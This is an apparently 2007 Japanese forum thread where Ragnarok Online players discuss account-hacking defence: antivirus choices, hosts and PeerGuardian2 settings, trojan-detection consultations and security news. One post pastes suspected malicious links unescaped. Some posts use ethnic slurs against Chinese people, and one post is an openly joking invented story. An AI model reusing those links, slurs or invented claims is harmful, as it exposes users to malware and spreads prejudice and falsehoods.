(○口○*)さん <>sage<>07/08/09 20:51 ID:3x0WeA4e0<> ■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■
アカウントハックが横行する昨今、セキュリティに関して話し合いましょう。
・ウイルスソフトやスパイウェアチェックソフトなどの一般的な質問。
・アカウントハック対策に関しての討論など。
・セキュリティ関係の最新情報、ニュースなど。
・垢ハックを踏んでしまった時の相談などはMMOBBS/Ragnarok板の総合対策スレへ。
・垢ハックと関係のないものを踏んだ場合はこちらでOKです。
・危険性があるURLは「.」を「■」に置き換えて貼り付けください。
アカウントハック総合対策スレ8
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1185352481/
■スレの性格上、誤って危険なURLがそのまま貼られてしまう可能性がある■
■URLを無闇に踏んで回らないこと。報告・相談はテンプレを利用すること■
現在のテンプレは暫定的なものです。スレの話し合いの結果はROセキュリティWikiへ。
http://rosafe.rowiki.jp/
※ ID/Pass/サーバ/キャラ名等の情報は公開しないでください
※ ネタや程度を超えた雑談・脱線はご遠慮ください
・スレ立て依頼は>>970がしてください。反応がなければ以降10ごとに。
【過去スレ】
セキュリティ対策、質問・雑談スレ2
http://enif.mmobbs.com/test/read.cgi/livero/1177485590/ <>セキュリティ対策、質問・雑談スレ3
(○口○*)さん<>sage<>07/08/09 20:53 ID:3x0WeA4e0<> 【PCにウィルス対策ソフトを導入してない方へ】
・カスペルスキー:オンライン ウイルス&スパイウェアスキャナ
http://www.kaspersky.co.jp/scanforvirus/
・Kaspersky Anti-Virus (体験版)
http://www.kaspersky.co.jp/trial/
・NOD32 アンチウイルス (体験版)
http://www.canon-sol.jp/product/nd/trial.html
【参考アドレス】
・ROアカウントハック報告スレのまとめサイト
http://sky.geocities.jp/vs_ro_hack/
・安全の為に (BSWikiより)
http://smith.xrea.jp/?Security
・リネージュ資料室 (応用可能な情報が多数)
http://lineage.nyx.bne.jp/
【このスレでよく出てくるアプリケーション】
・PeerGuardian2
http://sky.geocities.jp/vs_ro_hack/pg2.htm
■PG2用 RO許可リスト■
RAGNAROK-JP:61.215.212.0-61.215.212.255
RAGNAROK-JP2:61.215.214.128-61.215.214.255
WEB-SYSTEM:61.215.220.64-61.215.220.255
RAGNAROK-JP2:211.13.228.0-211.13.228.255
GUNGHO-MODE:211.13.229.0-211.13.229.255
RAGNAROK-JP3:211.13.232.0-211.13.232.255
RAGNAROK-JP4:211.13.235.0-211.13.235.255
GUNGHO-PAT1:219.123.155.160-219.123.155.191
GUNGHO-PAT1:221.247.195.160-221.247.195.191
GUNGHO-PAT3:125.101.19.64-125.101.19.95
GUNGHO-PAT4:124.32.117.192-124.32.117.22
■前スレ969によるhosts更新支援スクリプト■
あこすれてんぷら避難所を間借りする事で公開しました。
ttp://acopri.s250.xrea.com/index.php?hostsRenewScript
一応説明を付けていますが、自己責任、という事でお願いします。
cfgとvbsの2ファイル構成で、動作に必要なwget等は付属してません。
※ 配布ページとファイルをよく読んで、【自己責任にて】 ご利用ください <>
(○口○*)さん<>sage<>07/08/09 20:53 ID:3x0WeA4e0<> 【質問・相談の際の注意】
・誤クリックによる感染を防ぐ為に危険なアドレスは .(ドット)を別の文字に
置き換えて報告して下さい (■がよく使われています)
・質問前後にテンプレやまとめサイト等を見て知識を深めると更にGoodです
・回答者はエスパーでは有りません。情報は出来るだけ多く。提供した情報の量と質に
応じて助言の量と質は向上します
・結局は本人にしかどうにも出来ない事を忘れてはいけません
・基本的な対処方法は、総合対策スレの>>5をお読みください。
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1185352481/5
----------相談用テンプレ----------
【 気付いた日時 】 (感染?に気付いた日時)
【不審なアドレスのクリックの有無 】 (blog/bbs/Wiki等で踏んだ記憶の有無とそのアドレス)
【 アドレス 】 (ドット(.)を■等で置き換える事。h抜き等は駄目)
【 OS 】 (SP等まで正確に書く)
【使用ブラウザ 】 (バージョン等まで分かれば書く)
【WindowsUpdateの有無】 (一番最後はいつ頃か、等)
【 アンチウイルスソフト 】 (NortonInternetSecurity2007 等)
【その他のSecurty対策 】 (Spybot S&D、ルータ、等)
【 ウイルススキャン結果】 (カスペルスキーオンラインスキャンでRODLL.DLL発見 等)
【テンプレの参考サイトを読んだか】 (Yes/No/今から読みます)
【hosts変更】(有/無 [有りの場合は最終更新は何時ごろか])
【PeerGuardian2導入】(有/無 [有りの場合は参照元サイトはどこか)
【説明】
(『怪しいアドレス』との判断した理由、症状を詳しく書く) <>
(○口○*)さん<>sage<>07/08/09 20:54 ID:3x0WeA4e0<> 【安全対策の簡易まとめ】
以下は要点となります。詳しくは関連サイトを見てください。
・アドレスをホイホイ踏まない。よく確認する。
・出所の怪しいプログラムやスクリプトを実行しない。
・定期的なMicrosoftUpdate及び、各種ソフト(各種Player、Reader等)のアップデートを行う
・アンチウイルスソフトの導入とウイルス定義ファイルの積極的な更新を行う
・パーソナルファイアウォールソフト等を導入する
・hostsの利用した危険ドメインのブロック
・PeerGuardian2を使った危険IPのブロック など
・IEコンポーネント未使用のブラウザに乗り換える(Firefox、Opera等)
・IEを使う場合は下記を設定
・信頼できるSite以外ではスクリプトやActiveXを切る
:インターネットオプションのセキュリティの部分で設定可能
・偽装jpg対策(IE7とIE6SP2限定。IE6SP1以前では出来ない)
:インターネットオプション→セキュリティ→レベルのカスタマイズ
→「拡張子ではなく、内容によってファイルを開くこと」の項目を無効にする <>
(○口○*)さん<>sage<>07/08/09 21:09 ID:3LZ+SVGK0<> ■なにか踏んだ時に取るべき対処■
0.解決するまで、ログインやパスワード変更を行なわない。踏んだ後にパスワード入力などを行なってしまった場合
安全な環境(テンプレぽいものや、Ragnarok板側のテンプレ、Wikiを参照)からパスワード変更。
1.除去し、クリーンな環境に戻す
1−1.発見された場合。
それを削除して完了
1−2.発見されなかった場合
1−2−1.リスクを覚悟でそのまま使う(非推奨)
リスクを減らす為に、NOD32、カスペなど複数のソフト(試用版が入手できる筈)でスキャンを繰り返し
安全である可能性が高いことを確認すること。
ただし複数のソフトを同時にインストールすると干渉してOSが不安定になる事があるので注意。
1−2−2.再インストール
メーカー製の場合、データのバックアップをとって、リカバリーをかける。
自作やショップブランドの場合、データのバックアップをとって、OSを入れなおす。
1−3.安全な環境にする
1−3−1.WindowsUpdateをかける
1−3−2.ウィルス対策ソフト・FW・PG2を導入し、設定する。
(可能なら、スパイウェア対策のソフトも導入し、定期的にスキャンする)
1−3−3.セキュリティソフトの定義ファイルを最新にする。(当然定期的に自動更新する設定に)
1−4.環境を戻す
バックアップした「データ」を戻す。各種ソフトを再インストール。
その後、ウィルススキャンを再度実行。
ウィルスはバックアップしたデータ内に潜んでいる可能性があります。
1−5.ガンホーIDを削除す…ではなくて、ようやくROをプレイできる環境になりました、おめでとう。 <>
(○口○*)さん<>sage<>07/08/09 21:09 ID:3LZ+SVGK0<> 【このリンクは危険?と思ったときに】
変なリンクを見つけた場合、次の方法でチェックしましょう。
1.まとめサイトやリネージュ資料室のhostsや危険ドメイン一覧で確認
過去に見つかった罠サイトは、これらのサイトに載っています。
まずはここに載っていないかを確認しましょう。
2.ソースチェッカーオンラインを使って調べる
多少の知識が必要ですが、ソースチェッカーを使うことでリンク先を調べる事が出来ます。
ソース内に怪しいコード・スクリプトが無いか調べましょう。
※安全か危険かの判断は自分で行う必要があります。
また画像ファイルをチェックする場合、罠画像ファイルだと発動する恐れもあるので
注意してください。
3.スレで質問する
1.2の方法でも判断出来ない場合、スレで聞いてみるのも手です。
ただし、このスレは『勇気が無くて見れないサイト解説スレ』ではありません。
その点だけは注意してください。
質問・報告する場合は「.」を「■」に置き換えるのを忘れないようにしてください。 <>
(○口○*)さん<>sage<>07/08/09 21:10 ID:3LZ+SVGK0<> スレ立て乙でした。
このスレのテンプレも、未だ案の状態。分かりにくいところ、重複の削除、必要な情報の欠落など
改善すべき点への意見を出しあっていきましょう。 <>
(○口○*)さん<><>07/08/13 15:25 ID:ZsJ75Xhs0<> なんか下がりすぎというか新スレになって機能してない気がするあげ <>
(○口○*)さん<>sage<>07/08/14 16:47 ID:/0P2OV5B0<> ROとは関係ないけど、セキュリティのニュースだからこっちでいいよね。
http://www.chunichi.co.jp/article/national/news/CK2007081402040985.html
サイバー攻撃で現金要求 HPまひさせ「解決する」 国内初被害
2007年8月14日 夕刊
(長いので前文略)
情報セキュリティー会社「ラック」によると、今年四月中旬、東京都内の
情報提供会社のHPにDoS攻撃が仕掛けられ、突然利用できなくなった。
五分後、情報提供会社に男の声で電話があり「今、HPが止まっているでしょう。
私たちなら解決できる」と話した。
男はその後、メールで「料金は六十万円」「一時的に修復して技術を証明する」
「早めに解決した方がいい。四十万円でも技術を提供する」などと連絡。ラック側で
対策を取り、二日後に攻撃は止まった。メールの発信元は中国だったという。
-----
ヤツら直接恐喝する手に出ましたよ。
この件もボットネットが使われた可能性が高いとのこと、
被害者はもちろん加害者にならぬよう、皆様どうかお気をつけて…。 <>
(○口○*)さん<>sage<>07/08/14 16:59 ID:0x0JR2SC0<> 欧米露では昔からあった手法だね。 <>
(○口○*)さん<><>07/08/15 05:12 ID:1wWFsnib0<> 月例WU恒例age
ttp://www.microsoft.com/japan/technet/security/bulletin/ms07-aug.mspx
出かける前には忘れずに(何処へだ <>
(○口○*)さん<>sage<>07/08/15 07:53 ID:QMQhM82V0<> アップデートいっぱい来てた。
IEとVMLはすぐにでも狙われそうだね。 <>
(○口○*)さん<>sage<>07/08/15 14:24 ID:NPgP3dZt0<> 簡易ブラクラURLチェックが404ERRORになるんだが閉鎖したのか? <>
(○口○*)さん<>sage<>07/08/17 08:12 ID:ku8bbI3H0<> RO2を試してみると、カスペが叫びまくる。
検知しました: リスクウェア Invader
プロセスを実行します。: C:\WINDOWS\system32\winlogon.exe
プロセスを実行します。: C:\WINDOWS\explorer.exe
等々。
今まで以上にnProが恐ろしい影の活動をしているのでしょうか。 <>
(○口○*)さん<>sage<>07/08/17 11:19 ID:GMmn55MV0<> 最近のnProはどのゲームでも不具合出すだけで不正対策効果は薄いと言う
いらないものになって来てるな。 <>
(○口○*)さん<>sage<>07/08/17 19:13 ID:hOzZhG2o0<> ROクライアントをダウンロードしようとするとカスペが反応するんだが
これって以前からだっけ? <>
(○口○*)さん<>sage<>07/08/17 20:49 ID:e3s3Eqr60<> >>16 とは違うかもしれませんが、私の場合トロイが発見されます。
【 アドレス 】 不明
【気付いた日時】 8月17日正午
【 OS 】 WindowsXP Home Edtion service pack2
【使用ブラウザ 】 Firefox 2,0
【WindowsUpdateの有無】 8月16日に実行
【 アンチウイルスソフト 】 カスペルスキーインターネットセキュリティ6,0
【その他のSecurty対策 】 PG2
【 ウイルススキャン結果】カスペにてスキャン Trojan.Win32.Agent.axa発見
【スレログやテンプレを読んだか】 Yes
【hosts変更】有
【PeerGuardian2導入】有 リネージュ資料室の2種とアカウントハックまとめサイトのリスト
【説明】
まず何が起きたかを羅列します。
1 カスペにて完全スキャン実行
2 Trojan.Win32.Agent.axa発見
3 HDDのリカバリ領域以外を削除
4 HDDより購入時の状態に復元
5 FireFoxをダウンロード
6 完全スキャンをかけ、何も出ないのを確認した後、パスワード変更
7 ROクライアントをダウンロードしようとしたところ、
C:\DOCUME~1\管理者\LOCALS~1\Temp\icqsdihe.exeでTrojan.Win32.Agent.axaが発見
8 カスペにて上記を削除(現在)
Trojan.Win32.Agent.axaは、別のマルウェアをダウンロードするもののようです。
何がどうなっているのでしょうか、これから私のすべきことは何でしょうか? <>
17<>sage<>07/08/17 20:57 ID:e3s3Eqr60<> 連投失礼します。
書き忘れがありました。
【その他のSecurty対策 】PG2とルーター
です。
それと初めの「Trojan.Win32.Agent.axa」は、綴りがうろ覚えなのですが
Ro_setup.exeから発見されました。 <>
(○口○*)さん<>sage<>07/08/17 21:09 ID:h5OTRAHd0<> RO2じゃなくてROの蔵?
rag_setup.exeかな。
DLしてみようと思ったら、1.12GBって何事だ…… <>
(○口○*)さん<>sage<>07/08/17 21:46 ID:bjOc+AIW0<> 誤検出っぽい感じがするな <>
(○口○*)さん<>sage<>07/08/17 21:58 ID:g9jp6Cho0<> DLしてみたが、特に検出されないな。
ダウンローダかなにかが感染してるとかないかな。それで、起動したらそっちにも取り付いたとか。
>>17の、「3 HDDのリカバリ領域以外を削除」というのが怪しい。非表示のファイルが残っていたんじゃあるまいか。 <>
(○口○*)さん<>sage<>07/08/17 22:00 ID:h5OTRAHd0<> DLしてカスペとNOD32にかけてみたけど何も検出されず。
というよりicqsdihe.exeというファイル自体見あたらなかったんだが。
RO蔵とは関係ない、何か別の物が検出されてるんじゃ? <>
(○口○*)さん<>sage<>07/08/17 22:08 ID:g9jp6Cho0<> >>22
感染→取り付いたファイル(Rag_setup.exe)に取り付く
発動→ cq〜で、ICQ鯖に接続してダウンロードなり、指令を受け取るなりする状態になる
除去→取り付いたファイル(Rag_setup.exe)削除。テンポラリに残骸残り
HDD消去→多分、非表示ファイルは残った=残骸そのまま
OSの上書きインストール→残骸そのまま
検査→残骸を検出
感染後に発動すると生成されるファイルだと思うよ <>
(○口○*)さん<>sage<>07/08/17 22:36 ID:YlZyV0HB0<> 話題に出ているので。
【 気付いた日時 】 2007/08/17 14:04:19
【不審なアドレスのクリックの有無】 朝目新聞からリンクされているBlog等。
【 OS 】 WindowsXP Home Edtion sp2
【使用ブラウザ 】 IE6
【WindowsUpdateの有無】8/15に更新
【アンチウイルスソフト】カスペルスキーインターネットセキュリティ6.0
【 ウイルススキャン結果】 ↑で完全スキャン、Trojan.Win32.Agent.axa検出
【その他のSecurty対策 】 特になし
【テンプレの参考サイトを読んだか】 Yes
【hosts変更】無
【PeerGuardian2導入】無
【説明】
毎日PC立ち上げ時、ネットサーフィン後、PC終了時に
定義ファイルを更新して完全スキャンをしているのですが
昨日は何も検知なしでPC終了。
本日昼にPCを立ち上げてスキャンしたところ
d:\system volume information\_restore{中略}\rp12\a0000907.exe
にトロイ 「Trojan.Win32.Agent.axa」を検知しました
まずDドライブなのに驚いて
Kaspersky Labでの検知・更新リリース時刻が今日午前中だったので
新しいものなのだろうか、と思いつつ。
検出元は、駆除ができなかったので、削除→システム復元をオフにし
以後こまめに完全スキャンorオンラインスキャン→検知されず。
妙なところに感染するものだなと思いましたが、結局正体は分かりません。 <>
(○口○*)さん<>sage<>07/08/18 03:04 ID:a+RAJPfU0<> 該当ファイルをVirusToatalにかけてみたかな?
NODやBitDefenderあたりが反応して無いならば誤検知の可能性も無きにしも非ず <>
(○口○*)さん<>sage<>07/08/18 20:43 ID:xYbZwjfM0<> Symantec Security Response Weblog: MPack: Getting More Dangerous
ttp://www.symantec.com/enterprise/security_response/weblog/2007/08/mpack_getting_more_dangerous.html
Mpack v0.91に関する解説。ここに挙げられている中に、アップデート漏れがあったら注意。
ウイルス感染パソコン、ネット強制切断可能に――官民で指針
ttp://it.nikkei.co.jp/security/news/index.aspx?n=AS3S14017%2015082007
感染に気づかなかったり、放置していたりすると、ネット接続すら止められて駆除の手だてが無くなり、手遅れになりますよっと。
若者が答えの出ない難問に向き合ったセキュリティキャンプ2007:ITpro
ttp://itpro.nikkeibp.co.jp/article/NEWS/20070817/279851/
現役学生は、このレベルの物が無料受講できるのだから得だな、と。 <>
まと ◆sp4Sh9QXGI<>sage<>07/08/20 18:17 ID:bxzJcU1H0<> ITmediaより:
http://www.itmedia.co.jp/enterprise/articles/0708/20/news016.html
今度はLhazだそうです。 <>
(○口○*)さん<>sage<>07/08/21 00:53 ID:g9jqirzf0<> 暫定対策版のver.1.34β2が出てます <>
(○口○*)さん<><>07/08/21 01:14 ID:vnSRz0cG0<> おつかれさまです。かなり下がってるので、たまにはageてみる。 <>
17<>sage<>07/08/23 01:46 ID:tAVHhwY50<> 散々レスが遅れてすいません。皆様レスありがとうございます。
17日の22時ごろ、もう一度クライアントをダウンロードしてみたのですが、
今度はなんの反応もなく、無事ダウンロードできました。
確証はありませんが、どうも誤検知だったのではないかと思われます。
お騒がせしてすいませんでした。 <>
にゅぼーん<>にゅぼーん<>にゅぼーん<>にゅぼーん<>にゅぼーん
(○口○*)さん<>sage<>07/08/23 01:50 ID:lzK9xtyS0<> やっぱりここにも爆撃きたか。
流石にこのスレ住人で踏む人は居ないだろうけど…… <>
(○口○*)さん<>sage<>07/08/23 02:26 ID:x8XJauPH0<> そもそもこの文読むとBOT購買とか言ってる時点で
踏む奴いないだろうにと
思うんだが、やっぱり引っかかる奴いんのか <>
(○口○*)さん<>sage<>07/08/23 03:27 ID:R9wW4B1M0<> うちのPC時々重くなったり、水こぼしたせいで押してないキー(Ctrlとか)が勝手に反応したりするから、誤クリックしないかやや不安。
ええ、早く修理しろって話ですね <>
(○口○*)さん<>sage<>07/08/23 04:11 ID:27sSNmi20<> うちの鯖だと早速Q深淵武器とかが垢ハク露店に並んでて転売しようとしたバカが晒されてた
時期的にこれに引っかかったとしたらお粗末過ぎるボス厨だわ <>
(○口○*)さん<>sage<>07/08/23 04:45 ID:ToBq+Jcc0<> >>34
その書き方だと、デスクトップではなさそうだな。
ノートの場合だと、最初はキーボード不良だけで済んでいたものが、放置していると本体ロジックボードまで腐蝕や侵食が
進行して、修理金額が跳ね上がったりするかもしれないよ。 <>
(○口○*)さん<>sage<>07/08/23 16:57 ID:FjzkmoZL0<> 爆撃は垢ハックじゃないのにそれを笑われても <>
(○口○*)さん<>sage<>07/08/24 00:21 ID:LvvUZB440<> 「パンダウイルス」の作者が起訴される、有罪なら禁固5年以上
ttp://itpro.nikkeibp.co.jp/article/NEWS/20070823/280189/
で、福建の方は何で放置? <>
(○口○*)さん<>sage<>07/08/24 00:22 ID:ZGScZ/wP0<> 国内被害と敵国工作の違い <>
(○口○*)さん<>sage<>07/08/24 09:55 ID:+d5ipPv10<> 2台のパソコンにウイルスバスター入れてるんだけど2台とも警告がでてきました。
「疑わしい変更が見つかりました」1件の危険度[高]の変更
中身は「Windowsのセキュリティーポリシーの設定」
この前のWindowsアップデートの影響が今頃でてきたのかな? <>
(○口○*)さん<>sage<>07/08/25 21:11 ID:UIDJIAL80<> それにしても福建人は今日もどこかであの手この手だ。
今度はヤフー掲示板にトピ立てしてる。
しかも日付は昨日、と。
messages.yahoo.co.jp/bbs?.mm=GN&action=m&board=1835039&tid=ffckdcbdwma5blog&sid=1835039&mid=1&type=date&first=1
これをパクってその中の一部リンクを書き換えている。
www.applechina.net/tag/博客
投稿者 :
”zb009992000”
をGoogle検索すると・・・。
http://ja.wikipedia.org/wiki/利用者:Zb009992000
吹いた。
ヤフーにゃ苦情を入れておいたが、さてどういう対応をするのか。 <>
(○口○*)さん<>sage<>07/08/27 00:56 ID:pKoKKQpi0<> いつからか不明だけど Thunderbirdを起動すると、
必ずカスペルスキーがクラッシュしてしまう。
同じ症状の人いる? <>
(○口○*)さん<>sage<>07/08/29 19:03 ID:lAiBppsY0<> ::::::::/ ヽ、 :: ::: ::: :::::::::::::::::::::::::::::::::
:::::/ lハ ::: : :: :::::::::: :::::::::::::::: ピンポ〜ン♪
::::l l /ノリ ::: : :: ::::::::::: ::::::::::::::::::::::::::
:::| /) / ::: : :: ::::::::: ::::::::::::::::::::::: 宅配です
::l /イ/| . :. :. .:: : :: :: :::::::: : ::::::::::::::::::
/ / ||/ / ̄ ̄ ̄ ̄ ̄7l::::::::::::::::::::
i /_,/i!/ / l::::::::::::::::
l 人 / KIS ./ /::::::::::::::::
l / /⌒ヽ ver.7 / /::::::::::::::::
l /il | ) / /::::::::::::::::
ll l i! `ー、\___ /.n/::::::::::::::::
lヽ l |\. \ /⌒〉::::::::::::::::
〃´⌒ヽ
., -―― メ/_´⌒ヽ
/ / ̄ ´ヽ ヽ
./ , /// ト. ! 、 丶ヽ
l / /(((リ从 リノ)) '
| i l ● ヽノ ●V l ねんがんの
l ,=! l ⊂⊃、_,、_, ⊂⊃l Kaspersky Internet Security
l ヾ! ', l (__,ノ l l が届いた!!
| ヽヽヽ //
l ヾ≧ , __ , イ〃
li (´`)l {ニ0ニ}、 |_"___
li /l, l└ タl」/|. Kingsoft ..|
リヽ/ l l__ ./ |_________|
,/ L__[]っ / /
http://internet.watch.impress.co.jp/cda/news/2007/08/29/16732.html <>
(○口○*)さん<>sage<>07/08/29 19:21 ID:9mCE03300<> ますます信用ならんな、言いしれぬ不安があるwww <>
(○口○*)さん<>sage<>07/08/29 19:39 ID:xoBAspZY0<> まあシナ企業だしなwwwwwwwww <>
(○口○*)さん<>sage<>07/08/29 19:59 ID:koMa14U40<> 不安はあるし、対応も遅いが、本スレで報告のある新種は一通り検体送ってるので
ある程度は、ブロックしてくれる事だろう。
新種には弱いだろうけどな。 <>
(○口○*)さん<>sage<>07/08/29 21:47 ID:FlKwtc4j0<> 何も入れてないとか、使用期限切れのソフトを放置したままよりは、遥かにまし。 <>
(○口○*)さん<>sage<>07/08/31 00:03 ID:AvgcYDfP0<> Kingsoft Internet Security free
Kaspersky Internet Security
どっちも略称がKISなのか・・・ <>
(○口○*)さん<>sage<>07/08/31 00:42 ID:BcrT+XGA0<> >>48
>>43 <>
(○口○*)さん<>sage<>07/08/31 00:59 ID:P+EGiMcE0<> カスペ厨はKISと略して書かないくせにKISを見ると異常に噛み付くんだよなw <>
(○口○*)さん<>sage<>07/08/31 01:38 ID:JZEfI6cz0<> 何でも厨つければいいってもんじゃありませんぞっ。
でもキングソフトはどうも信用ならんな。 <>
(○口○*)さん<>sage<>07/08/31 09:19 ID:lSzLfCa10<> カスペをKIS/KAVと略すのは全世界標準のことだよ。
頭文字を取れば普通にそうなるんだし本国ロシア公式フォーラムでもKISと略されている。
しかしROのアカ/セキュスレでは性能が遥かに優秀なKingsoft Internet Securityこそが
KISという略称を使うに相応しい存在だから、劣るKaspersky Internet Securityはカスペ(笑)と略される。
近年プーチンはKingsoft Internet Securityをキングに、Kaspersky Internet SecurityをKISにするよう
中国に求めたがかなわず、先月ロシアは国際連合児童基金(UNICEF)に提訴することとなった。 <>
(○口○*)さん<>sage<>07/08/31 12:14 ID:p2Vh/Zwm0<> そういうのは
>出典:民明書房
ってちゃんと書いておかないと。 <>
(○口○*)さん<>sage<>07/08/31 12:17 ID:jjx5CXhh0<> >52の2行目まではわかるんだけど
それ以降書いてある事がおかしく感じるのは、目の錯覚なんだろうか。 <>
(○口○*)さん<>sage<>07/08/31 12:18 ID:jjx5CXhh0<> あ、成る程、納得。 >出典 <>
(○口○*)さん<>sage<>07/08/31 12:50 ID:JZEfI6cz0<> (゚σд ゚)フーン 初代スレから居たが初めて聞いたわ。 <>
(○口○*)さん<>sage<>07/08/31 17:37 ID:gO7CGwKjO<> 誘導されてきました、一つ質問させてください。
現在スレッドを携帯端末で閲覧しているのですが、アカウントハックのURLを踏んでも大丈夫なのでしょうか?
PCとの互換も無くハックウィルス自体も携帯を狙った物では無いと思うのですが…
勿論故意に踏む気は無く、十分注意をしています。しかし、万が一が無いとも限らないので。
自分一人では結論付けが出来ないのでどなたかご回答お願い致します。 <>
(○口○*)さん<>sage<>07/08/31 19:10 ID:wF5cxyKn0<> 垢ハックウイルスはどこにある何をどうやって盗むのかということを考えれば
自ずと答えは出るかと思います <>
(○口○*)さん<>sage<>07/08/31 20:15 ID:AquhaZqO0<> >57
基本的に携帯は無害。
ROの垢ハクのトロイはWindows上で動くものなので、OSやCPUが全く別種の携帯は発動できない。
ただし携帯そのものを狙うタイプのウィルスも存在する。
なので携帯なら100%安全というわけではない。
単にROの垢ハクのウィルスには無害なだけ。 <>
(○口○*)さん<>sage<>07/08/31 20:22 ID:ERpbjRp70<> というか、ROも起動しないから、
ログイン時に盗む方法では笑い話にしかならん。
ウィルスうんぬんより、胡散臭いメールとかフィッシングページの方が、
携帯に限れば可能性あるわ。 <>
(○口○*)さん<>sage<>07/08/31 21:19 ID:JSKclDPB0<> カスペ繋がらない・・・鯖落ち? <>
(○口○*)さん<>sage<>07/08/31 21:51 ID:gO7CGwKjO<> >>58-60
やはり皆さんの言う通りみたいですね。
ただ携帯のモバイルシステムを狙ったリンクが出回らないとも限らないので、
十分気をつけたいと思います。
素早い返答、ありがとうございました。 <>
(○口○*)さん<>sage<>07/08/31 22:57 ID:W5Wjs3+80<> >>61
繋がらんね <>
(○口○*)さん<>sage<>07/08/31 23:16 ID:g1WkApFZ0<> カスペさんが落ちてるのが気になるなぁ・・・ <>
(○口○*)さん<>sage<>07/08/31 23:55 ID:p2Vh/Zwm0<> ---
ttp://www.just-kaspersky.jp/
2007.08.31
オンラインスキャナへの接続がしにくい状態となっています。
皆様には大変ご迷惑をお掛けいたしますが、今しばらく時間をおいてアクセスしていただけますようお願い申し上げます。
---
他ゲーでも中華の侵攻が急拡大してるらしいから、スキャン需要が急増してるのも関係するかもね <>
(○口○*)さん<>sage<>07/09/01 01:39 ID:wp4uicEi0<> やっぱカスペ落ちてたのか <>
(○口○*)さん<>sage<>07/09/01 08:32 ID:U66aTym/0<> 連中が、セキュリティベンダーに対してもDDoSを仕掛け始めた可能性も考慮されるな。
穴狙いという面については、油断ならない手合いだし。 <>
(○口○*)さん<><>07/09/02 02:24 ID:ktcEf2AfO<> すみません。相談なのですが、
勤務が終わりパソコンを立ち上げたらいきなりノートンが『リモートコントロールによるトロイの木馬』と
高危険度を示す表示がいきなり飛び出てきました。
詳細を見たら『遮断しておきました』と出たのですが初めての事だったので
動揺してホスト等の表示も出ていたのですが
すぐ閉じてしまいました。
カスペルスキーでオンラインスキャンをかけましたが
何一つ出て来ませんでした。
駄文&不明点多数で申し訳ございませんが、この状況は極めて危険なのでしょうか?
アンインストールは極力避けたいのですが場合によってはします。
御指南よろしくお願いします。 <>
(○口○*)さん<>sage<>07/09/02 03:02 ID:CrW4dbdD0<> >68
情報が少なすぎて何とも。
ノートンは使ってないんだが、ログが残ってたりはしないか?
通信の遮断をしてるようだから取りあえずはブロックしてると思うが
何が元でそれが出たのかが判らないと、何とも言えないと思う。
既にバックドアが仕込まれてて、それが通信をかけた場合は
駆除しないとダメだろうし、誰かが外から無差別のアタックを
仕掛けてて、それに反応しただけかもしれないし。 <>
(○口○*)さん<>sage<>07/09/02 04:00 ID:ktcEf2AfO<> 69>>少し落ち着き、履歴が見れましたので詳細を。
突然出た表示は『ルールBlaトロイの木馬のデファルト遮断が〜(IPアドレス)を遮断しました』と出ていました。
履歴を見て気付いたのですが同じ所から
今日、7月3日、6月21日、5月7日、3月27日に
同じ状態になった様子です。
これは外からの攻撃を遮断したという事ですかね?
質問ばかりすみません。 <>
(○口○*)さん<>sage<>07/09/02 04:15 ID:qa4/G8UK0<> ルールBlaトロイの木馬のデファルト遮断、でぐぐってみ
よく読んでないがいろいろ出てきたぞ <>
(○口○*)さん<>sage<>07/09/02 05:29 ID:ktcEf2AfO<> 71>>
ご解答ありがとうございます。
なんかバグだか誤判定との見解みたいですので安眠出来ます。 <>
(○口○*)さん<>sage<>07/09/02 11:14 ID:5q/idA730<> 質問です。FWをきらずにROをプレイすることは可能でしょうか?
FW入り→ROパッチあたらない→必然的にFW切り(5分だけ無効)→パッチあててプレイ
毎回やってるとメンドクサイのですが・・・まあ暫くはきりっぱなしでやってましたがOTL
どうかアドバイスお願いします <>
(○口○*)さん<>sage<>07/09/02 11:24 ID:JqW5Fpni0<> ∩___∩ |
| ノ\ ヽ |
/ ●゛ ● | |
| ∪ ( _●_) ミ j
彡、 |∪| | J
/ ∩ノ ⊃ ヽ
( \ / _ノ | |
.\ “ /__| |
\ /___ / <>
(○口○*)さん<>sage<>07/09/02 11:32 ID:ieFRoJNr0<> >>73
パッチに失敗するなら、パッチ鯖との通信だけ許可してやれ。
具体的には、Ragnarok.exe
先日、差し替えられたので、Ragnarok.exeの通信許可は、改めて設定しないとだめ。 <>
(○口○*)さん<><>07/09/03 23:36 ID:87TB9J5K0<> アンチウイルスソフト入れててもルーターかましてても
pfw入れてないと意味が無いと思うんだが・・・
外からの侵入を防ぐ防壁だけで
中から駄々漏れじゃなぁ・・・ <>
(○口○*)さん<>sage<>07/09/03 23:42 ID:WFRP3um+0<> 普通、ルーターは双方向で止められると思うんだが <>
(○口○*)さん<>sage<>07/09/04 00:46 ID:LESR6DYO0<> パーソナルユースのルータだと、宛て先/元指定のInbound/Outboundブロックが限界だろうから、pfwというかIDSの導入は必要だろうね。
最近のトロイは、port80でそのまま送出するものが多いから、port指定ブロックは難しいし。
VPN向けのような、IDS/IPSも搭載されているクラスのルータ使用が前提なら、pfwを併用しなくとも、ある程度のセキュリティは確保できる
ケースも、無論あるけど。 <>
(○口○*)さん<>sage<>07/09/04 12:31 ID:8NDkNKOW0<> ざっくり書けば
その辺で売ってるようなルーターだと内側からの通信が漏れる事がある。
大企業が使うようなイイカンジのルーターだとある程度大丈夫。
だから一般家庭でルーターいれてる人でも
ファイアウォールソフトは入れておいたほうがいいぞ。
こんなかんじ? <>
(○口○*)さん<>sage<>07/09/04 12:37 ID:FnyfT11J0<> 友人にアカハックが怖かったらIEからFirefoxかOpera辺りに乗り換えると多少ましになる
と言われて多少調べたのですが
IEの場合
exe直踏み→アウト
アカハックサイト→ActiveXがoffでないとアウト
偽装jpg→とりあえず開く設定だとアウト
FirefoxかOperaの場合
exe直踏み→アウト
アカハックサイト→ActiveXを使っていないのでセーフ
偽装jpg→中身と拡張子が一致しないといけないのでセーフ
デフォルトでセーフの場合が多いFirefoxかOperaの方がIEに比べてまだ安全である
という認識でいいのでしょうか? <>
(○口○*)さん<>sage<>07/09/04 13:16 ID:9QBcK3rA0<> IEにしろFxにしろ
exe直踏み→アウト
デフォでこれはない。 <>
(○口○*)さん<>sage<>07/09/04 13:28 ID:WGU1eyFK0<> ちょっとぐぐってみたら、こんな記事があった。
ttp://www.shareedge.com/spywareguide/txt_articles.php?article=txt_20050415.php
----------------------------------------------------
